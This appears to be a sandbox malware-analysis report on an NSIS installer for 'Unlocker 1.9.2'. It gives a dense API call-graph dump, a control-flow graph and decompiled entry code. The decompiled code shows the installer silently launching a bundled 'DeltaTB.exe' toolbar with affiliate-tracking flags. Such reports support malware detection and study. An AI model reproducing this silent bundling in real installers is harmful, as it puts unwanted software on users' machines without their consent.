2967 4059dd lstrcpynA 2948->2967 2949->2948 2951 405b7b SHGetPathFromIDListA CoTaskMemFree 2949->2951 2950->2948 2951->2948 2953 405c4b 2952->2953 2955 405ca8 CharNextA 2953->2955 2957 405cb3 2953->2957 2959 405c96 CharNextA 2953->2959 2960 405ca3 CharNextA 2953->2960 2969 4054fb 2953->2969 2954 405cb7 CharPrevA 2954->2957 2955->2953 2955->2957 2957->2954 2958 405cd2 2957->2958 2958->2908 2959->2953 2960->2955 2962 405935 2961->2962 2963 4058f7 RegQueryValueExA 2961->2963 2962->2948 2964 405918 RegCloseKey 2963->2964 2964->2962 2966->2948 2967->2948 2968->2936 2970 405501 2969->2970 2971 405514 2970->2971 2972 405507 CharNextA 2970->2972 2971->2953 2972->2970 2974 402ea7 2973->2974 2974->2919 2974->2920 2974->2922 2976 405e1e 2975->2976 2977 405e26 2975->2977 2976->2930 2977->2976 2978 405eb6 GlobalAlloc 2977->2978 2979 405ead GlobalFree 2977->2979 2980 405f24 GlobalFree 2977->2980 2981 405f2d GlobalAlloc 2977->2981 2978->2976 2978->2977 2979->2978 2980->2981 2981->2976 2981->2977 2984 404d96 2982->2984 2992 404e39 2982->2992 2983 404db3 lstrlenA 2986 404dc1 lstrlenA 2983->2986 2987 404ddc 2983->2987 2984->2983 2985 4059ff 18 API calls 2984->2985 2985->2983 2988 404dd3 lstrcatA 2986->2988 2986->2992 2989 404de2 SetWindowTextA 2987->2989 2990 404def 2987->2990 2988->2987 2989->2990 2991 404df5 SendMessageA SendMessageA SendMessageA 2990->2991 2990->2992 2991->2992 2992->2930 2993->2914 4143 402803 4144 4029d9 18 API calls 4143->4144 4145 402809 4144->4145 4146 40283a 4145->4146 4147 402817 4145->4147 4149 40265c 4145->4149 4148 4059ff 18 API calls 4146->4148 4146->4149 4147->4149 4151 40593b wsprintfA 4147->4151 4148->4149 4151->4149 2994 401b06 2995 401b13 2994->2995 2996 401b57 2994->2996 2999 4021fb 2995->2999 3003 401b2a 2995->3003 2997 401b80 GlobalAlloc 2996->2997 2998 401b5b 2996->2998 3000 4059ff 18 API calls 2997->3000 3012 401b9b 2998->3012 3015 4059dd lstrcpynA 2998->3015 3001 4059ff 18 API calls 2999->3001 3000->3012 3002 402208 3001->3002 3016 40529e 3002->3016 3013 4059dd lstrcpynA 3003->3013 3006 401b6d GlobalFree 3006->3012 3008 401b39 3014 4059dd lstrcpynA 3008->3014 3010 401b48 3020 4059dd lstrcpynA 3010->3020 3013->3008 3014->3010 3015->3006 3018 4052b3 3016->3018 3017 4052ff 3017->3012 3018->3017 3019 4052c7 MessageBoxIndirectA 3018->3019 3019->3017 3020->3012 4152 402506 4153 4029d9 18 API calls 4152->4153 4154 402510 4153->4154 4155 402544 ReadFile 4154->4155 4156 402588 4154->4156 4158 402598 4154->4158 4160 402586 4154->4160 4155->4154 4155->4160 4161 40593b wsprintfA 4156->4161 4159 4025ae SetFilePointer 4158->4159 4158->4160 4159->4160 4161->4160 4162 404186 4163 404196 4162->4163 4164 4041bc 4162->4164 4165 403d8f 19 API calls 4163->4165 4166 403df6 8 API calls 4164->4166 4167 4041a3 SetDlgItemTextA 4165->4167 4168 4041c8 4166->4168 4167->4164 4169 401c8a 4170 4029d9 18 API calls 4169->4170 4171 401c91 4170->4171 4172 4029d9 18 API calls 4171->4172 4173 401c99 GetDlgItem 4172->4173 4174 4024b8 4173->4174 4174->4174 4182 401490 4183 404d7b 25 API calls 4182->4183 4184 401497 4183->4184 3582 401d95 3583 4029d9 18 API calls 3582->3583 3584 401d9b 3583->3584 3585 4029d9 18 API calls 3584->3585 3586 401da4 3585->3586 3587 401db6 EnableWindow 3586->3587 3588 401dab ShowWindow 3586->3588 3589 40288b 3587->3589 3588->3589 4185 402615 4186 402618 4185->4186 4187 402630 4185->4187 4188 402625 FindNextFileA 4186->4188 4188->4187 4189 40266f 4188->4189 4191 4059dd lstrcpynA 4189->4191 4191->4187 4192 401595 4193 4029f6 18 API calls 4192->4193 4194 40159c SetFileAttributesA 4193->4194 4195 4015ae 4194->4195 4196 401e95 4197 4029f6 18 API calls 4196->4197 4198 401e9c 4197->4198 4199 405cd8 2 API calls 4198->4199 4200 401ea2 4199->4200 4201 401eb4 4200->4201 4203 40593b wsprintfA 4200->4203 4203->4201 4204 401696 4205 4029f6 18 API calls 4204->4205 4206 40169c GetFullPathNameA 4205->4206 4207 4016b3 4206->4207 4213 4016d4 4206->4213 4210 405cd8 2 API calls 4207->4210 4207->4213 4208 4016e8 GetShortPathNameA 4209 40288b 4208->4209 4211 4016c4 4210->4211 4211->4213 4214 4059dd lstrcpynA 4211->4214 4213->4208 4213->4209 4214->4213 3622 401e1b 3623 4029f6 18 API calls 3622->3623 3624 401e21 3623->3624 3625 404d7b 25 API calls 3624->3625 3626 401e2b 3625->3626 3627 40523d 2 API calls 3626->3627 3631 401e31 3627->3631 3628 401e87 CloseHandle 3630 40265c 3628->3630 3629 401e50 WaitForSingleObject 3629->3631 3632 401e5e GetExitCodeProcess 3629->3632 3631->3628 3631->3629 3631->3630 3633 405d38 2 API calls 3631->3633 3634 401e70 3632->3634 3635 401e7b 3632->3635 3633->3629 3638 40593b wsprintfA 3634->3638 3635->3628 3637 401e79 3635->3637 3637->3628 3638->3637 4215 401d1b GetDC GetDeviceCaps 4216 4029d9 18 API calls 4215->4216 4217 401d37 MulDiv 4216->4217 4218 4029d9 18 API calls 4217->4218 4219 401d4c 4218->4219 4220 4059ff 18 API calls 4219->4220 4221 401d85 CreateFontIndirectA 4220->4221 4222 4024b8 4221->4222 4230 40249c 4231 4029f6 18 API calls 4230->4231 4232 4024a3 4231->4232 4235 4056b4 GetFileAttributesA CreateFileA 4232->4235 4234 4024af 4235->4234 3639 402020 3640 4029f6 18 API calls 3639->3640 3641 402027 3640->3641 3642 4029f6 18 API calls 3641->3642 3643 402031 3642->3643 3644 4029f6 18 API calls 3643->3644 3645 40203a 3644->3645 3646 4029f6 18 API calls 3645->3646 3647 402044 3646->3647 3648 4029f6 18 API calls 3647->3648 3649 40204e 3648->3649 3650 402062 CoCreateInstance 3649->3650 3651 4029f6 18 API calls 3649->3651 3654 402081 3650->3654 3655 402137 3650->3655 3651->3650 3652 401423 25 API calls 3653 402169 3652->3653 3654->3655 3656 402116 MultiByteToWideChar 3654->3656 3655->3652 3655->3653 3656->3655 3657 401721 3658 4029f6 18 API calls 3657->3658 3659 401728 3658->3659 3660 4056e3 2 API calls 3659->3660 3661 40172f 3660->3661 3662 4056e3 2 API calls 3661->3662 3662->3661 4236 401922 4237 4029f6 18 API calls 4236->4237 4238 401929 lstrlenA 4237->4238 4239 4024b8 4238->4239 3663 402223 3664 40222b 3663->3664 3667 402231 3663->3667 3665 4029f6 18 API calls 3664->3665 3665->3667 3666 402241 3669 40224f 3666->3669 3670 4029f6 18 API calls 3666->3670 3667->3666 3668 4029f6 18 API calls 3667->3668 3668->3666 3671 4029f6 18 API calls 3669->3671 3670->3669 3672 402258 WritePrivateProfileStringA 3671->3672 4240 403ea3 lstrcpynA lstrlenA 4241 401ca5 4242 4029d9 18 API calls 4241->4242 4243 401cb5 SetWindowLongA 4242->4243 4244 40288b 4243->4244 4245 401a26 4246 4029d9 18 API calls 4245->4246 4247 401a2c 4246->4247 4248 4029d9 18 API calls 4247->4248 4249 4019d6 4248->4249 3683 402427 3693 402b00 3683->3693 3685 402431 3686 4029d9 18 API calls 3685->3686 3687 40243a 3686->3687 3688 402451 RegEnumKeyA 3687->3688 3689 40245d RegEnumValueA 3687->3689 3690 40265c 3687->3690 3691 402476 RegCloseKey 3688->3691 3689->3690 3689->3691 3691->3690 3694 4029f6 18 API calls 3693->3694 3695 402b19 3694->3695 3696 402b27 RegOpenKeyExA 3695->3696 3696->3685 3697 4022a7 3698 4022d7 3697->3698 3699 4022ac 3697->3699 3701 4029f6 18 API calls 3698->3701 3700 402b00 19 API calls 3699->3700 3702 4022b3 3700->3702 3703 4022de 3701->3703 3704 4029f6 18 API calls 3702->3704 3708 4022f6 3702->3708 3709 402a36 RegOpenKeyExA 3703->3709 3706 4022c4 RegDeleteValueA RegCloseKey 3704->3706 3706->3708 3712 402a61 3709->3712 3717 4022f4 3709->3717 3710 402a87 RegEnumKeyA 3711 402a99 RegCloseKey 3710->3711 3710->3712 3714 405cff 3 API calls 3711->3714 3712->3710 3712->3711 3713 402abe RegCloseKey 3712->3713 3715 402a36 3 API calls 3712->3715 3713->3717 3716 402aa9 3714->3716 3715->3712 3716->3717 3718 402ad9 RegDeleteKeyA 3716->3718 3717->3708 3718->3717 4250 405fa8 4252 405e2c 4250->4252 4251 406797 4252->4251 4253 405eb6 GlobalAlloc 4252->4253 4254 405ead GlobalFree 4252->4254 4255 405f24 GlobalFree 4252->4255 4256 405f2d GlobalAlloc 4252->4256 4253->4251 4253->4252 4254->4253 4255->4256 4256->4251 4256->4252 3719 401bad 3720 4029d9 18 API calls 3719->3720 3721 401bb4 3720->3721 3722 4029d9 18 API calls 3721->3722 3723 401bbe 3722->3723 3724 401bce 3723->3724 3725 4029f6 18 API calls 3723->3725 3726 4029f6 18 API calls 3724->3726 3731 401bde 3724->3731 3725->3724 3726->3731 3727 401be9 3729 4029d9 18 API calls 3727->3729 3728 401c2d 3730 4029f6 18 API calls 3728->3730 3732 401bee 3729->3732 3733 401c32 3730->3733 3731->3727 3731->3728 3734 4029d9 18 API calls 3732->3734 3735 4029f6 18 API calls 3733->3735 3736 401bf7 3734->3736 3737 401c3b FindWindowExA 3735->3737 3738 401c1d SendMessageA 3736->3738 3739 401bff SendMessageTimeoutA 3736->3739 3740 401c59 3737->3740 3738->3740 3739->3740 4257 4023af 4258 402b00 19 API calls 4257->4258 4259 4023b9 4258->4259 4260 4029f6 18 API calls 4259->4260 4261 4023c2 4260->4261 4262 4023cc RegQueryValueExA 4261->4262 4265 40265c 4261->4265 4263 4023ec 4262->4263 4267 4023f2 RegCloseKey 4262->4267 4263->4267 4268 40593b wsprintfA 4263->4268 4267->4265 4268->4267 3741 4015b3 3742 4029f6 18 API calls 3741->3742 3743 4015ba 3742->3743 3744 405564 4 API calls 3743->3744 3755 4015c2 3744->3755 3745 40160a 3746 40162d 3745->3746 3747 40160f 3745->3747 3753 401423 25 API calls 3746->3753 3749 401423 25 API calls 3747->3749 3748 4054fb CharNextA 3750 4015d0 CreateDirectoryA 3748->3750 3752 401616 3749->3752 3751 4015e5 GetLastError 3750->3751 3750->3755 3754 4015f2 GetFileAttributesA 3751->3754 3751->3755 3759 4059dd lstrcpynA 3752->3759 3758 402169 3753->3758 3754->3755 3755->3745 3755->3748 3757 401621 SetCurrentDirectoryA 3757->3758 3759->3757 3760 401734 3761 4029f6 18 API calls 3760->3761 3762 40173b 3761->3762 3763 401761 3762->3763 3764 401759 3762->3764 3800 4059dd lstrcpynA 3763->3800 3799 4059dd lstrcpynA 3764->3799 3767 40175f 3770 405c3f 5 API calls 3767->3770 3768 40176c 3769 4054d0 3 API calls 3768->3769 3771 401772 lstrcatA 3769->3771 3777 40177e 3770->3777 3771->3767 3772 405cd8 2 API calls 3772->3777 3773 405695 2 API calls 3773->3777 3775 401795 CompareFileTime 3775->3777 3776 401859 3778 404d7b 25 API calls 3776->3778 3777->3772 3777->3773 3777->3775 3777->3776 3779 4059dd lstrcpynA 3777->3779 3786 4059ff 18 API calls 3777->3786 3794 40529e MessageBoxIndirectA 3777->3794 3797 401830 3777->3797 3798 4056b4 GetFileAttributesA CreateFileA 3777->3798 3780 401863 3778->3780 3779->3777 3783 402e5b 37 API calls 3780->3783 3781 404d7b 25 API calls 3782 401845 3781->3782 3784 401876 3783->3784 3785 40188a SetFileTime 3784->3785 3787 40189c FindCloseChangeNotification 3784->3787 3785->3787 3786->3777 3787->3782 3788 4018ad 3787->3788 3789 4018b2 3788->3789 3790 4018c5 3788->3790 3792 4059ff 18 API calls 3789->3792 3791 4059ff 18 API calls 3790->3791 3793 4018cd 3791->3793 3795 4018ba lstrcatA 3792->3795 3796 40529e MessageBoxIndirectA 3793->3796 3794->3777 3795->3793 3796->3782 3797->3781 3797->3782 3798->3777 3799->3767 3800->3768 4276 401634 4277 4029f6 18 API calls 4276->4277 4278 40163a 4277->4278 4279 405cd8 2 API calls 4278->4279 4280 401640 4279->4280 4281 401934 4282 4029d9 18 API calls 4281->4282 4283 40193b 4282->4283 4284 4029d9 18 API calls 4283->4284 4285 401945 4284->4285 4286 4029f6 18 API calls 4285->4286 4287 40194e 4286->4287 4288 401961 lstrlenA 4287->4288 4289 40199c 4287->4289 4290 40196b 4288->4290 4290->4289 4294 4059dd lstrcpynA 4290->4294 4292 401985 4292->4289 4293 401992 lstrlenA 4292->4293 4293->4289 4294->4292 4295 4019b5 4296 4029f6 18 API calls 4295->4296 4297 4019bc 4296->4297 4298 4029f6 18 API calls 4297->4298 4299 4019c5 4298->4299 4300 4019cc lstrcmpiA 4299->4300 4301 4019de lstrcmpA 4299->4301 4302 4019d2 4300->4302 4301->4302 4303 4014b7 4304 4014bd 4303->4304 4305 401389 2 API calls 4304->4305 4306 4014c5 4305->4306 3801 404eb9 3802 405065 3801->3802 3803 404eda GetDlgItem GetDlgItem GetDlgItem 3801->3803 3805 405096 3802->3805 3806 40506e GetDlgItem CreateThread CloseHandle 3802->3806 3847 403dc4 SendMessageA 3803->3847 3807 4050c1 3805->3807 3809 4050e3 3805->3809 3810 4050ad ShowWindow ShowWindow 3805->3810 3806->3805 3853 404e4d 5 API calls 3806->3853 3811 40511f 3807->3811 3813 4050d2 3807->3813 3814 4050f8 ShowWindow 3807->3814 3808 404f4b 3816 404f52 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3808->3816 3815 403df6 8 API calls 3809->3815 3849 403dc4 SendMessageA 3810->3849 3811->3809 3819 40512a SendMessageA 3811->3819 3850 403d68 3813->3850 3822 405118 3814->3822 3823 40510a 3814->3823 3821 4050f1 3815->3821 3817 404fc1 3816->3817 3818 404fa5 SendMessageA SendMessageA 3816->3818 3824 404fd4 3817->3824 3825 404fc6 SendMessageA 3817->3825 3818->3817 3819->3821 3826 405143 CreatePopupMenu 3819->3826 3828 403d68 SendMessageA 3822->3828 3827 404d7b 25 API calls 3823->3827 3830 403d8f 19 API calls 3824->3830 3825->3824 3829 4059ff 18 API calls 3826->3829 3827->3822 3828->3811 3831 405153 AppendMenuA 3829->3831 3832 404fe4 3830->3832 3833 405166 GetWindowRect 3831->3833 3834 405179 3831->3834 3835 405021 GetDlgItem SendMessageA 3832->3835 3836 404fed ShowWindow 3832->3836 3837 405182 TrackPopupMenu 3833->3837 3834->3837 3835->3821 3840 405048 SendMessageA SendMessageA 3835->3840 3838 405010 3836->3838 3839 405003 ShowWindow 3836->3839 3837->3821 3841 4051a0 3837->3841 3848 403dc4 SendMessageA 3838->3848 3839->3838 3840->3821 3842 4051bc SendMessageA 3841->3842 3842->3842 3844 4051d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3842->3844 3845 4051fb SendMessageA 3844->3845 3845->3845 3846 40521c GlobalUnlock SetClipboardData CloseClipboard 3845->3846 3846->3821 3847->3808 3848->3835 3849->3807 3851 403d75 SendMessageA 3850->3851 3852 403d6f 3850->3852 3851->3809 3852->3851 4307 402b3b 4308 402b63 4307->4308 4309 402b4a SetTimer 4307->4309 4310 402bb8 4308->4310 4311 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4308->4311 4309->4308 4311->4310 3882 4038bc 3883 4038d4 3882->3883 3884 403a0f 3882->3884 3883->3884 3885 4038e0 3883->3885 3886 403a20 GetDlgItem GetDlgItem 3884->3886 3887 403a60 3884->3887 3888 4038eb SetWindowPos 3885->3888 3889 4038fe 3885->3889 3890 403d8f 19 API calls 3886->3890 3891 403aba 3887->3891 3899 401389 2 API calls 3887->3899 3888->3889 3892 403903 ShowWindow 3889->3892 3893 40391b 3889->3893 3894 403a4a KiUserCallbackDispatcher 3890->3894 3895 403ddb SendMessageA 3891->3895 3913 403a0a 3891->3913 3892->3893 3896 403923 DestroyWindow 3893->3896 3897 40393d 3893->3897 3898 40140b 2 API calls 3894->3898 3909 403acc 3895->3909 3949 403d18 3896->3949 3900 403942 SetWindowLongA 3897->3900 3901 403953 3897->3901 3898->3887 3902 403a92 3899->3902 3900->3913 3905 4039ca 3901->3905 3906 40395f GetDlgItem 3901->3906 3902->3891 3907 403a96 SendMessageA 3902->3907 3903 40140b 2 API calls 3903->3909 3904 403d1a DestroyWindow KiUserCallbackDispatcher 3904->3949 3912 403df6 8 API calls 3905->3912 3910 403972 SendMessageA IsWindowEnabled 3906->3910 3911 40398f 3906->3911 3907->3913 3908 403d49 ShowWindow 3908->3913 3909->3903 3909->3904 3909->3913 3914 4059ff 18 API calls 3909->3914 3923 403d8f 19 API calls 3909->3923 3925 403d8f 19 API calls 3909->3925 3940 403c5a KiUserCallbackDispatcher 3909->3940 3910->3911 3910->3913 3915 40399c 3911->3915 3916 4039e3 SendMessageA 3911->3916 3917 4039af 3911->3917 3924 403994 3911->3924 3912->3913 3914->3909 3915->3916 3915->3924 3916->3905 3919 4039b7 3917->3919 3920 4039cc 3917->3920 3918 403d68 SendMessageA 3918->3905 3921 40140b 2 API calls 3919->3921 3922 40140b 2 API calls 3920->3922 3921->3924 3922->3924 3923->3909 3924->3905 3924->3918 3926 403b47 GetDlgItem 3925->3926 3927 403b64 ShowWindow KiUserCallbackDispatcher 3926->3927 3928 403b5c 3926->3928 3950 403db1 KiUserCallbackDispatcher 3927->3950 3928->3927 3930 403b8e KiUserCallbackDispatcher 3933 403ba2 3930->3933 3931 403ba7 GetSystemMenu EnableMenuItem SendMessageA 3932 403bd7 SendMessageA 3931->3932 3931->3933 3932->3933 3933->3931 3951 403dc4 SendMessageA 3933->3951 3952 4059dd lstrcpynA 3933->3952 3936 403c05 lstrlenA 3937 4059ff 18 API calls 3936->3937 3938 403c16 SetWindowTextA 3937->3938 3939 401389 2 API calls 3938->3939 3939->3909 3941 403c74 CreateDialogParamA 3940->3941 3940->3949 3942 403ca7 3941->3942 3941->3949 3943 403d8f 19 API calls 3942->3943 3944 403cb2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3943->3944 3945 401389 2 API calls 3944->3945 3946 403cf8 3945->3946 3946->3913 3947 403d00 ShowWindow 3946->3947 3948 403ddb SendMessageA 3947->3948 3948->3949 3949->3908 3949->3913 3950->3930 3951->3933 3952->3936 4312 40263e 4313 4029f6 18 API calls 4312->4313 4314 402645 FindFirstFileA 4313->4314 4315 402668 4314->4315 4316 402658 4314->4316 4317 40266f 4315->4317 4320 40593b wsprintfA 4315->4320 4321 4059dd lstrcpynA 4317->4321 4320->4317 4321->4316 4322 4024be 4323 4024c3 4322->4323 4324 4024d4 4322->4324 4325 4029d9 18 API calls 4323->4325 4326 4029f6 18 API calls 4324->4326 4328 4024ca 4325->4328 4327 4024db lstrlenA 4326->4327 4327->4328 4329 4024fa WriteFile 4328->4329 4330 40265c 4328->4330 4329->4330

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 004030CB Relevance: 73.8, APIs: 24, Strings: 18, Instructions: 270filestringcomCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 4030cb-403160 #17 SetErrorMode OleInitialize call 405cff SHGetFileInfoA call 4059dd GetCommandLineA call 4059dd GetModuleHandleA 7 403162-403167 0->7 8 40316c-403181 call 4054fb CharNextA 0->8 7->8 11 4031e6-4031ea 8->11 12 403183-403186 11->12 13 4031ec 11->13 14 403188-40318c 12->14 15 40318e-403196 12->15 16 4031ff-403217 GetTempPathA call 403097 13->16 14->14 14->15 17 403198-403199 15->17 18 40319e-4031a1 15->18 25 403239-403250 DeleteFileA call 402c22 16->25 26 403219-403237 GetWindowsDirectoryA lstrcatA call 403097 16->26 17->18 20 4031a3-4031a7 18->20 21 4031d6-4031e3 call 4054fb 18->21 23 4031b7-4031bd 20->23 24 4031a9-4031b2 20->24 21->11 38 4031e5 21->38 30 4031cd-4031d4 23->30 31 4031bf-4031c8 23->31 24->23 28 4031b4 24->28 40 4032b7-4032c6 ExitProcess OleUninitialize 25->40 41 403252-403258 25->41 26->25 26->40 28->23 30->21 36 4031ee-4031fa call 4059dd 30->36 31->30 35 4031ca 31->35 35->30 36->16 38->11 44 4033b1-4033b7 40->44 45 4032cc-4032dc call 40529e ExitProcess 40->45 42 4032a7-4032ae call 403526 41->42 43 40325a-403263 call 4054fb 41->43 53 4032b3 42->53 58 40326e-403270 43->58 46 403434-40343c 44->46 47 4033b9-4033d6 call 405cff * 3 44->47 54 403442-403446 ExitProcess 46->54 55 40343e 46->55 73 403420-40342b ExitWindowsEx 47->73 74 4033d8-4033da 47->74 53->40 55->54 59 403272-40327c 58->59 60 403265-40326b 58->60 62 4032e2-4032fc lstrcatA lstrcmpiA 59->62 63 40327e-40328b call 4055b1 59->63 60->59 65 40326d 60->65 62->40 66 4032fe-403313 CreateDirectoryA SetCurrentDirectoryA 62->66 63->40 76 40328d-4032a3 call 4059dd * 2 63->76 65->58 69 403320-40333a call 4059dd 66->69 70 403315-40331b call 4059dd 66->70 84 40333f-40335b call 4059ff DeleteFileA 69->84 70->69 73->46 81 40342d-40342f call 40140b 73->81 74->73 78 4033dc-4033de 74->78 76->42 78->73 82 4033e0-4033f2 GetCurrentProcess 78->82 81->46 82->73 91 4033f4-403416 82->91 92 40339c-4033a3 84->92 93 40335d-40336d CopyFileA 84->93 91->73 92->84 94 4033a5-4033ac call 40572b 92->94 93->92 95 40336f-40338f call 40572b call 4059ff call 40523d 93->95 94->40 95->92 105 403391-403398 CloseHandle 95->105 105->92
                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				struct _SECURITY_ATTRIBUTES* _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				int _t50;
				signed int _t51;
				signed int _t54;
				int _t55;
				signed int _t59;
				intOrPtr _t70;
				intOrPtr _t76;
				void* _t78;
				void* _t88;
				void* _t90;
				char* _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				CHAR* _t104;
				signed int _t105;
				intOrPtr _t112;
				char _t119;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t98 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f38 = _t34;
				 *0x423e84 = E00405CFF(8);
				SHGetFileInfoA(0x41f430, 0,  &_v360, 0x160, 0); // executed
				E004059DD("Unlocker 1.9.2 Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t95 = "\"C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe\"";
				E004059DD(_t95, _t39);
				 *0x423e80 = GetModuleHandleA(0);
				_t42 = _t95;
				if("\"C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe\"" == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004054FB(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t90 =  *_t44;
					_t108 = _t90;
					if(_t90 == 0) {
						break;
					}
					__eflags = _t90 - 0x20;
					if(_t90 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004054FB(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000002;
									__eflags = _t98;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000004;
									__eflags = _t98;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E004059DD("C:\\Program Files\\Unlocker", _t45);
								L20:
								_t104 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t104);
								_t48 = E00403097(_t108);
								_t109 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C22(_t110, _t98); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x423f14; // 0x0
											if(__eflags != 0) {
												_t105 = E00405CFF(3);
												_t99 = E00405CFF(4);
												_t54 = E00405CFF(5);
												__eflags = _t105;
												_t96 = _t54;
												if(_t105 != 0) {
													__eflags = _t99;
													if(_t99 != 0) {
														__eflags = _t96;
														if(_t96 != 0) {
															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t59;
															if(_t59 != 0) {
																 *_t99(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t55 = ExitWindowsEx(2, 0);
												__eflags = _t55;
												if(_t55 == 0) {
													E0040140B(9);
												}
											}
											_t51 =  *0x423f2c; // 0xffffffff
											__eflags = _t51 - 0xffffffff;
											if(_t51 != 0xffffffff) {
												_v396 = _t51;
											}
											ExitProcess(_v396);
										}
										E0040529E(_v404, 0x200010);
										ExitProcess(2);
									}
									_t112 =  *0x423e9c; // 0x0
									if(_t112 == 0) {
										L31:
										 *0x423f2c =  *0x423f2c | 0xffffffff;
										_v400 = E00403526();
										goto L32;
									}
									_t102 = E004054FB(_t95, 0);
									while(_t102 >= _t95) {
										__eflags =  *_t102 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t102 = _t102 - 1;
										__eflags = _t102;
									}
									_t114 = _t102 - _t95;
									_v408 = "Error launching installer";
									if(_t102 < _t95) {
										lstrcatA(_t104, "~nsu.tmp");
										_t100 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t104, "C:\\Users\\jones\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t104, 0);
										SetCurrentDirectoryA(_t104);
										_t119 = "C:\\Program Files\\Unlocker"; // 0x43
										if(_t119 == 0) {
											E004059DD("C:\\Program Files\\Unlocker", _t100);
										}
										E004059DD(0x424000, _v396);
										"\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt" = 0x41;
										_t97 = 0x1a;
										do {
											_t70 =  *0x423e90; // 0x73eeb0
											E004059FF(0, _t97, 0x41f030, 0x41f030,  *((intOrPtr*)(_t70 + 0x120)));
											DeleteFileA(0x41f030);
											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe", 0x41f030, 1) != 0) {
												_push(0);
												_push(0x41f030);
												E0040572B();
												_t76 =  *0x423e90; // 0x73eeb0
												E004059FF(0, _t97, 0x41f030, 0x41f030,  *((intOrPtr*)(_t76 + 0x124)));
												_t78 = E0040523D(0x41f030);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_v416 = 0;
												}
											}
											"\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt" =  &("\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt"[1]);
											_t97 = _t97 - 1;
										} while (_t97 != 0);
										_push(0);
										_push(_t104);
										E0040572B();
										goto L32;
									}
									 *_t102 = 0;
									_t103 = _t102 + 4;
									if(E004055B1(_t114, _t102 + 4) == 0) {
										goto L32;
									}
									E004059DD("C:\\Program Files\\Unlocker", _t103);
									E004059DD("C:\\Program Files\\Unlocker", _t103);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t104, 0x3fb);
								lstrcatA(_t104, "\\Temp");
								_t88 = E00403097(_t109);
								_t110 = _t88;
								if(_t88 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                                                                                                                                              0x004030d7
                                                                                                                                                              0x004030db
                                                                                                                                                              0x004030e3
                                                                                                                                                              0x004030e5
                                                                                                                                                              0x004030ea
                                                                                                                                                              0x004030f5
                                                                                                                                                              0x004030fc
                                                                                                                                                              0x00403104
                                                                                                                                                              0x0040310e
                                                                                                                                                              0x00403124
